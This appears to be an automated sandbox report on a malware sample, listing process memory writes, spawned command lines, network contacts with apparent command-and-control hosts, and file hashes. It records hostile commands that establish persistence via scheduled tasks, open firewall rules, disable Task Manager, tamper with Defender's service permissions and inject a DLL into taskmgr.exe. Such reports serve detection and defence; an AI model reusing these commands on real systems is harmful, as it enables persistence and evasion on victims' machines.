PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 1364 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Windows\SysWOW64\icacls.exe
PID 1364 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Windows\SysWOW64\icacls.exe
PID 1364 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Windows\SysWOW64\icacls.exe
PID 1364 wrote to memory of 5952 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 1364 wrote to memory of 5952 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 1364 wrote to memory of 5952 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4116 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 4116 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 4116 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 4116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe
PID 4116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe
PID 4116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe
PID 3444 wrote to memory of 5420 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEC9.exe
PID 3444 wrote to memory of 5420 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEC9.exe
PID 3444 wrote to memory of 5420 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEC9.exe
PID 3444 wrote to memory of 5812 N/A N/A C:\Windows\system32\cmd.exe
PID 3444 wrote to memory of 5812 N/A N/A C:\Windows\system32\cmd.exe
PID 5812 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5812 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3444 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe
PID 3444 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe
PID 3444 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe
PID 528 wrote to memory of 5644 N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 5644 N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 5644 N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 5700 N/A N/A C:\Users\Admin\AppData\Local\Temp\F88E.exe
PID 3444 wrote to memory of 5700 N/A N/A C:\Users\Admin\AppData\Local\Temp\F88E.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe

"C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8491.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f12340f9-b0e6-42e3-a341-afc21e6d6dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\9B28.exe

"C:\Users\Admin\AppData\Local\Temp\9B28.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\9B28.exe

"C:\Users\Admin\AppData\Local\Temp\9B28.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe"

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe"

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3500 -ip 3500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 2220

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E33F.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\F88E.exe

C:\Users\Admin\AppData\Local\Temp\F88E.exe

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

"C:\Users\Admin\AppData\Local\Temp\EB1F.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Users\Admin\AppData\Local\Temp\DBD.exe

C:\Users\Admin\AppData\Local\Temp\DBD.exe

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\5343.exe

C:\Users\Admin\AppData\Local\Temp\5343.exe

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\611E.exe

C:\Users\Admin\AppData\Local\Temp\611E.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\containerProviderhost\lSHV2TIIXWH4jLBRX.vbe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\containerProviderhost\SSJnjC24t.bat" "

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\containerProviderhost\runtimenetSvc.exe

"C:\containerProviderhost/runtimenetSvc.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FSRA6W5YHr.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe

"C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3352 -ip 3352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3352 -ip 3352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 428

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 trad-einmyus.com udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 70.174.106.193.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 brusuax.com udp
KR 211.119.84.112:80 brusuax.com tcp
US 8.8.8.8:53 112.84.119.211.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 24.65.21.104.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 104.21.65.24:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
KR 211.119.84.112:80 brusuax.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 habrafa.com udp
AR 190.224.203.37:80 habrafa.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 37.203.224.190.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
AR 190.224.203.37:80 habrafa.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 142.132.224.223:9001 tcp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 80.232.23.103.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 223.224.132.142.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 mahta-netwotk.click udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 172.67.217.100:443 resergvearyinitiani.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 100.217.67.172.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 detectordiscusser.shop udp
US 172.67.195.126:443 detectordiscusser.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 trypokemon.com udp
US 172.67.185.36:443 trypokemon.com tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 loftproper.com udp
US 104.21.11.77:443 loftproper.com tcp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 126.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 36.185.67.172.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 172.67.147.18:443 associationokeo.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 253.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 77.11.21.104.in-addr.arpa udp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
US 8.8.8.8:53 udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 lucasowen.com.tr udp
TR 185.50.70.125:443 lucasowen.com.tr tcp
US 8.8.8.8:53 125.70.50.185.in-addr.arpa udp
US 8.8.8.8:53 19ba1a44-f02e-4187-a0bc-55313d2895e2.uuid.createupdate.org udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server15.createupdate.org udp
US 15.197.250.192:3478 stun.sipgate.net udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.104:443 server15.createupdate.org tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 192.250.197.15.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
NL 80.85.246.217:80 80.85.246.217 tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
US 8.8.8.8:53 217.246.85.80.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 tcp
US 8.8.8.8:53 scandalbasketballoe.shop udp
US 172.67.198.240:443 scandalbasketballoe.shop tcp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 172.67.195.126:443 detectordiscusser.shop tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 240.198.67.172.in-addr.arpa udp
US 172.67.147.18:443 associationokeo.shop tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
NL 80.85.246.217:80 80.85.246.217 tcp
NL 80.85.246.217:80 80.85.246.217 tcp

Files

memory/4272-1-0x0000000002E50000-0x0000000002F50000-memory.dmp

memory/4272-2-0x0000000000400000-0x0000000002BE0000-memory.dmp

memory/4272-3-0x0000000002D70000-0x0000000002D7B000-memory.dmp

memory/3444-4-0x00000000022D0000-0x00000000022E6000-memory.dmp

memory/4272-5-0x0000000000400000-0x0000000002BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8491.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\9B28.exe

MD5 3d196de47911047d26c003e31a878038
SHA1 c368e8a2dacb6c322064f7f2aeb0b3cbcb274cd9
SHA256 19b9c4e7ba38960b14cf6557c7b6b7989009f0a7e368f1936050d1606c4cfc4a
SHA512 30871d6b7a9d94a602f21a6f5325f017c735db491351b64d9044b497c0f2d1cd8f0988857a358f29e077047ab5800a6384a2aa2ab17a539c2092d8828e87581b

memory/4760-20-0x0000000003740000-0x00000000037DA000-memory.dmp

memory/4760-21-0x0000000003900000-0x0000000003A1B000-memory.dmp

memory/1364-22-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-24-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-25-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-26-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-38-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5952-41-0x0000000001BC0000-0x0000000001C5E000-memory.dmp

memory/4116-44-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-45-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-46-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 61069f3e5ec893a06611f1e74f5193f9
SHA1 c7d77c232343d594a9b55274ee482edb9d879971
SHA256 63f54ad995160d65ece7dc146e050409d6f72bfceaaf28e4d7333fe2e619cec8
SHA512 5c972dc939629e86e564e692091935d1b2af8e80f8f9872c7edba8ac5272a845691c7a9cd6440b3fb7822fb864f05adcb706879c9c1d0f2f5a55222fb4b376c3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 1614610ded3e92091cb4a735cbd2b486
SHA1 a45cdac15521127de130232ee79a7e766576a4e3
SHA256 f069678a6146a5412e1d4ae7a11dc6a1cd1f63830790872e202d7aab14bd4303
SHA512 4a291fa54485381497065e10b2adc718420697ec243f8afda8fe44c354ab3bcbb81bc05eac5e4c36275d80861f0d39a7b0efe08c580d1995bb5ffed6ac28b04f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 610f387cecd6b98e4abcb72626ee7d13
SHA1 791f01f69d1e025c15660cc87c6a2d332c16d1c7
SHA256 dd9c87c9d210b8dcb6f9d2b897c11b0a480b955a0aeaf4bb9b661f1bdc0604d1
SHA512 97d58a6504e70c4ceb4f255c6327d076b8ffc017945a9a8474f1ece483a5326d572ef13d6e4e5ba6bc2dba4b9575f99085ca2af2dbabc375f6bf0e8bef554858

memory/4116-53-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-54-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-58-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-60-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-61-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe

MD5 c6d3d647baad8a5b93b81d2487f4f072
SHA1 e9c1105dc41f85d4f7e94d4e004f8427787c8802
SHA256 7754125653413cfca3bde887fb2a22f0cd5144ec447bb274c69b005861b70a0a
